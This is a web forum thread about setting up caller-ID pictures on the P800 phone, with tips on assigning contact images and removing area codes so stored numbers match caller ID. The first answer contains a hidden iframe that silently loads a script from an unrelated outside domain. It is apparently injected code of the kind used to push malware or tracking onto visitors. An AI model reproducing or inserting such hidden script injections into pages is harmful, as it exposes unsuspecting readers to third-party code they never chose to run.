+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

Can I use pictures to identify callers with the P800?

Yes, the P800 can display pictures (previously stored in your contacts list) for incoming calls, or when making outgoing calls.

The P800 also has a built-in camera for taking pictures.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

Pictures to identify callers ...

Any special trick involved in showing these pictures? I've set it all up, but the pics dosn't show when the callers call. The pics DO show on the speed-dial front, however.
    Prof. Mech.Eng. - DK

kat
    Go to 'Contacts' tap the name you want, tap the camera tab (near the bottom of the screen), tap the blank image placeholder and assign the picture you want.

tap the phone icon on the top of the screen, tap 'Edit' > 'Preferences' then 'Incoming call picture' and tick the box.

When I first got my contacts from Outlook, a lot of the phone numbers had area codes. The problem with the displaying of pictures is that the number stored has to be exactly like the one you have on you contact, and in my case, the number sent by the phone company on the caller id did not have the area code, so the picture would not be shown, even though it appeared on the speed dial list. What I did was take out ALL the area codes from my contacts, leaving just the number as it is sent by the phone company, so it now works.